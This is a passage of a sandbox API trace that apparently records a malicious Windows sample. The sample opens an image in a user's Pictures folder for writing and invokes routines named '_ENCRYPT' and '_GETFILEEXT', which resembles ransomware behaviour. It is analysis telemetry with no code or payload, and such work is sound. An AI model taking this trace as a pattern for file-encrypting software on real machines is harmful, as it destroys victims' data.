lpUsedDefaultChar=0x0) returned 72 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.876] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\3q41yk8hnsn8x6d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0040.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x7c38b0, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif") returned 72 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.878] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.878] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.880] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.880] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.881] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.882] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0040.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.882] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.882] CloseHandle (hObject=0x128) returned 1 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.883] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.883] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.883] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.883] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.883] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.883] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.884] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", lpFindFileData=0x6ae8c0 | out: 